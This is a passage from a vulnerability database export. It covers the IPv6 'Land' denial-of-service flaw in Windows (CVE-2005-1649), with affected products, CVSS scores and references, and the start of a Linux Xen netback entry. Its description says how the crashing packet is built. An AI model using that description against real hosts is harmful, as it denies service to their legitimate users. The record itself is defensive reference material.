        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.36"
      },
      {
        "model": "windows xp media center edition sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows nt workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.3"
      },
      {
        "model": "ios bt",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.0.17"
      },
      {
        "model": "windows server datacenter edition itanium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20030"
      },
      {
        "model": "freebsd",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "3.x"
      },
      {
        "model": "windows nt enterprise server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows server datacenter edition sp1 beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20031"
      },
      {
        "model": "windows nt enterprise server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.2.10"
      },
      {
        "model": "windows nt terminal server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.1.5"
      },
      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.1.7"
      },
      {
        "model": "bsd/os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bsdi",
        "version": "2.0.1"
      },
      {
        "model": "windows server web edition sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "windows nt enterprise server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows xp tablet pc edition sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows server enterprise edition itanium sp1 beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20031"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.2"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.2.3"
      },
      {
        "model": "bsd/os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bsdi",
        "version": "1.1"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.33"
      },
      {
        "model": "windows nt terminal server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "open desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sco",
        "version": "3.0"
      },
      {
        "model": "windows xp embedded sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.1.6.1"
      },
      {
        "model": "ios ia",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.1.9"
      },
      {
        "model": "windows xp embedded",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.16"
      },
      {
        "model": "netbsd",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "netbsd",
        "version": "1.3.2"
      },
      {
        "model": "ios aa",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.1.7"
      },
      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.0.17"
      },
      {
        "model": "windows server datacenter edition itanium sp1 beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20031"
      },
      {
        "model": "windows nt enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows server datacenter edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "windows nt terminal server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.0"
      },
      {
        "model": "unixware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sco",
        "version": "2.1"
      },
      {
        "model": "windows xp professional sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "freebsd",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.2.2"
      },
      {
        "model": "windows server standard edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.2.4"
      },
      {
        "model": "windows server enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003x64"
      },
      {
        "model": "ios a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.3.19"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netbsd",
        "version": "1.1"
      },
      {
        "model": "windows xp gold",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "0"
      },
      {
        "model": "ios f1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.2.4"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.35"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "11.0"
      },
      {
        "model": "windows xp home",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "cmw+",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sco",
        "version": "3.0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.2"
      },
      {
        "model": "bsd/os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bsdi",
        "version": "4.0"
      },
      {
        "model": "windows server web edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.1"
      },
      {
        "model": "ios ca",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.1.15"
      },
      {
        "model": "windows xp media center edition sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios/700",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.30"
      },
      {
        "model": "sunos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sun",
        "version": "4.1.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.1"
      },
      {
        "model": "windows nt server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "95"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.2.10"
      },
      {
        "model": "catalyst supervisor software",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "29xx2.4.401"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.37"
      },
      {
        "model": "sunos u1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sun",
        "version": "4.1.3"
      },
      {
        "model": "windows nt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "3.5.1"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.24"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.0"
      },
      {
        "model": "atm switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "marconi",
        "version": "6.1.1"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.32"
      },
      {
        "model": "windows nt server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows xp professional sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows xp home sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "catalyst supervisor software",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "29xx2.1.1102"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netbsd",
        "version": "1.2.1"
      },
      {
        "model": "windows xp 64-bit edition sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "open server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sco",
        "version": "5.0"
      },
      {
        "model": "windows xp 64-bit edition version sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "freebsd",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.2.8"
      },
      {
        "model": "windows nt workstation sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "ios p",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.2.9"
      },
      {
        "model": "atm switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "marconi",
        "version": "7.0.1"
      },
      {
        "model": "windows server datacenter edition sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.2.4"
      },
      {
        "model": "windows nt server sp4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.1.15"
      },
      {
        "model": "windows server enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.1.6"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.20"
      },
      {
        "model": "bsd/os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bsdi",
        "version": "4.0.1"
      },
      {
        "model": "windows xp 64-bit edition version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "ios ca",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.1.7"
      },
      {
        "model": "windows server datacenter edition itanium sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netbsd",
        "version": "1.2"
      },
      {
        "model": "windows nt terminal server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.1x"
      },
      {
        "model": "windows server datacenter edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003x64"
      },
      {
        "model": "windows server web edition sp1 beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20031"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.30"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "13658"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000332"
      },
      {
        "db": "NVD",
        "id": "CVE-2005-1649"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200505-1102"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_2003_server:enterprise:*:64-bit:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_2003_server:enterprise:sp1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_2003_server:enterprise_64-bit:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_2003_server:web:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_2003_server:web:sp1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_xp:*:sp1:embedded:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_2003_server:enterprise_64-bit:sp1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_2003_server:r2:*:64-bit:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_xp:*:*:64-bit:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_xp:*:*:embedded:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_xp:*:sp1:media_center:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_xp:*:sp2:home:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_2003_server:r2:*:datacenter_64-bit:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_2003_server:r2:sp1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_xp:*:*:home:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_xp:*:*:media_center:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_xp:*:sp2:media_center:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_xp:*:sp2:tablet_pc:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_2003_server:datacenter_64-bit:sp1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_2003_server:standard:*:64-bit:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_2003_server:standard:sp1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_xp:*:gold:professional:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_xp:*:sp1:64-bit:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_xp:*:sp1:home:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2005-1649"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Konrad Malewski\u203b koyot@moon.ondraszek.ds.polsl.gliwice.pl",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200505-1102"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2005-1649",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 5.0,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2005-1649",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2005-1649",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200505-1102",
            "trust": 0.6,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000332"
      },
      {
        "db": "NVD",
        "id": "CVE-2005-1649"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200505-1102"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The IPv6 support in Windows XP SP2, 2003 Server SP1, and Longhorn, with Windows Firewall turned off, allows remote attackers to cause a denial of service (CPU consumption) via a TCP packet with the SYN flag set and the same destination and source address and port, a variant of CVE-2005-0688 and a reoccurrence of the \"Land\" vulnerability (CVE-1999-0016). \nWhen a packet of this type is handled, an infinite loop is initiated and the affected system halts. \nA remote attacker may exploit this issue to deny service for legitimate users",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2005-1649"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000332"
      },
      {
        "db": "BID",
        "id": "13658"
      }
    ],
    "trust": 1.89
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2005-1649",
        "trust": 2.7
      },
      {
        "db": "BID",
        "id": "13658",
        "trust": 2.7
      },
      {
        "db": "VUPEN",
        "id": "ADV-2005-0559",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000332",
        "trust": 0.8
      },
      {
        "db": "NTBUGTRAQ",
        "id": "20050516 WINDOWS (XP, 2K3, LONGHORN) IS VULNERABLE TO IPV6 LAND ATTACK.",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200505-1102",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "13658"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000332"
      },
      {
        "db": "NVD",
        "id": "CVE-2005-1649"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200505-1102"
      }
    ]
  },
  "id": "VAR-200505-0723",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.33667661
  },
  "last_update_date": "2023-12-18T11:51:36.418000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.microsoft.com/ja/jp/default.aspx"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000332"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2005-1649"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/13658"
      },
      {
        "trust": 1.6,
        "url": "http://www.ntbugtraq.com/default.aspx?pid=36\u0026sid=1\u0026a2=ind0505\u0026l=ntbugtraq\u0026p=r409\u0026d=0\u0026f=n\u0026h=0\u0026o=d\u0026t=0"
      },
      {
        "trust": 1.4,
        "url": "http://www.frsirt.com/english/advisories/2005/0559"
      },
      {
        "trust": 1.0,
        "url": "http://www.vupen.com/english/advisories/2005/0559"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2005-1649"
      },
      {
        "trust": 0.8,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2005-1649"
      },
      {
        "trust": 0.3,
        "url": "http://support.avaya.com/elmodocs2/security/asa-2006-217.htm"
      },
      {
        "trust": 0.3,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms05-019.mspx"
      },
      {
        "trust": 0.3,
        "url": "http://www.microsoft.com/technet/security/bulletin/ms06-064.mspx"
      },
      {
        "trust": 0.3,
        "url": "http://support.microsoft.com/support/kb/articles/q165/0/05.asp"
      },
      {
        "trust": 0.3,
        "url": "http://support.microsoft.com/support/kb/articles/q177/5/39.asp"
      },
      {
        "trust": 0.3,
        "url": "http://support.novell.com/cgi-bin/search/tidfinder.cgi?2932511"
      },
      {
        "trust": 0.3,
        "url": "http://www.cisco.com/warp/public/770/land-pub.shtml#iosvers"
      },
      {
        "trust": 0.3,
        "url": "http://www.securityfocus.com/archive/1/392354"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/392642"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/393045"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/400188"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/392354"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "13658"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000332"
      },
      {
        "db": "NVD",
        "id": "CVE-2005-1649"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200505-1102"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "13658"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000332"
      },
      {
        "db": "NVD",
        "id": "CVE-2005-1649"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200505-1102"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2005-05-17T00:00:00",
        "db": "BID",
        "id": "13658"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2005-000332"
      },
      {
        "date": "2005-05-18T04:00:00",
        "db": "NVD",
        "id": "CVE-2005-1649"
      },
      {
        "date": "1997-11-13T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200505-1102"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-07-06T14:40:00",
        "db": "BID",
        "id": "13658"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2005-000332"
      },
      {
        "date": "2017-01-20T02:59:01.120000",
        "db": "NVD",
        "id": "CVE-2005-1649"
      },
      {
        "date": "2005-10-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200505-1102"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200505-1102"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Microsoft Windows Illegal in  IPv6 Service disruption due to packets  (Dos) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000332"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200505-1102"
      }
    ],
    "trust": 0.6
  }
}

var-202103-1029
Vulnerability from variot

An issue was discovered in the Linux kernel through 5.11.3, as used with Xen PV. A certain part of the netback driver lacks necessary treatment of errors such as failed memory allocations (as a result of changes to the handling of grant mapping errors). A host OS denial of service may occur during misbehavior of a networking frontend driver. NOTE: this issue exists because of an incomplete fix for CVE-2021-26931. This update provides the corresponding Linux kernel updates targeted specifically for Raspberry Pi devices in those same Ubuntu Releases. ========================================================================== Ubuntu Security Notice USN-4984-1 June 04, 2021

